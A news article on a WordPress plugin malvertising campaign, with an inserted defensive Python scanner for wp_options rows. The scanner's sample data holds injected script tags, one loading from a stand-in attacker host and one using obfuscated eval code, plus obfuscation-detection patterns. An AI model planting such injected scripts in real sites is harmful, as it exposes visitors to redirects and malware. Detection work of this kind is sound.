Attacks exploiting vulnerabilities in WordPress plugins, which allowed hackers to compromise sites last month, have continued, according to a security research company.
The malvertising campaign took advantage of the plugin flaws and led victim sites to display unwanted popup ads. Visitors of the compromised websites were also redirected to malicious and sketchy sites with potentially harmful content such as malware droppers and fraud sites.
After tracking the threat for some time for new or changing activity, Wordfence security researchers found that the attacks were coming from various IP addresses linked to web hosting providers. All but one of those IP addresses have since stopped the illegal activity; the remaining one has continued issuing attacks.
Rogue IP Identified
"The IP address in question is 220.127.116.11, a Rackspace server currently hosting some presumably compromised websites," said Mikey Veenstra, a threat analyst at Wordfence. He further disclosed that they have reached out to Rackspace to inform them of the activity, in the hope that the cloud hosting company will take action to prevent further attacks from its network.
The attacks have been targeting various known vulnerabilities in the following WordPress plugins: Bold Page Builder, Blog Designer, Live Chat with Facebook Messenger, Yuzo Related Posts, Visual CSS Style Editor, WP Live Chat Support, and Form Lightbox.
Wordfence said its built-in XSS firewall protection detected exploitation attempts against the Bold Page Builder vulnerability as early as Aug. 20. It is also possible that any unauthenticated XSS or options-update vulnerabilities disclosed in the near future will be quickly targeted by this particular threat actor.
The malvertising campaign has added a further script that attempts to install a backdoor on the victim's site by exploiting an administrator's session, running in the browser of a logged-in administrator who views the compromised page.
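Because this campaign stores its redirect script in plugin option values, one defensive check is to scan an export of the wp_options table for script tags that load from a host other than the site's own, or that use obfuscated inline code. The following scanner is an added example and not Wordfence's code; the option rows and the attacker-placeholder hostname are constructed samples.

```python
import re
from urllib.parse import urlparse

# Constructed sample rows of a wp_options table (option_name, option_value).
# The widget row imitates what an options-update attack leaves behind: a
# remote script tag stored in a serialized widget, executed by every visitor.
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.test"),
    ("blogname", "Example blog"),
    ("widget_text", 'a:1:{i:2;a:2:{s:5:"title";s:0:"";s:4:"text";s:63:"'
                    '<script src="//ads.attacker-placeholder.test/stat.js"></script>";}}'),
    ("custom_footer_html", "<script>eval(String.fromCharCode(118,97,114));</script>"),
    ("theme_inline", "<script>document.title = 'Example blog';</script>"),
]

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
OBFUSCATION = re.compile(r"eval\s*\(|unescape\s*\(|fromCharCode|atob\s*\(|\\x[0-9a-f]{2}", re.I)


def script_host(src):
    """Hostname of a script src; protocol-relative URLs (//host/x.js) are handled too."""
    return (urlparse(src).hostname or "").lower()


def scan_options(rows, site_host):
    """Return (option_name, verdict, detail) for every script tag found in option values.

    verdict is 'remote' for a script loaded from a host other than the site's own,
    'local' for a script loaded from the site itself, 'obfuscated' for inline code
    using eval/unescape/fromCharCode/atob/hex escapes, and 'inline' for plain
    inline scripts that still merit a manual look.
    """
    findings = []
    for name, value in rows:
        for m in SCRIPT_TAG.finditer(value):
            attrs, body = m.group(1), m.group(2)
            src = SRC_ATTR.search(attrs)
            if src:
                host = script_host(src.group(1))
                verdict = "remote" if host and host != site_host.lower() else "local"
                findings.append((name, verdict, src.group(1)))
            elif OBFUSCATION.search(body):
                findings.append((name, "obfuscated", body.strip()[:60]))
            else:
                findings.append((name, "inline", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for finding in scan_options(SAMPLE_OPTIONS, "example.test"):
        print("%-20s %-10s %s" % finding)
```

Run it against a real site by replacing SAMPLE_OPTIONS with rows read from a database dump and site_host with the site's own hostname; 'remote' and 'obfuscated' findings are the ones to investigate first.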
According to internet security company Symantec, malicious advertising, or malvertising, uses legitimate online advertising services to spread malware: infected advertisements are placed on regular web pages and infect a device through the web browser.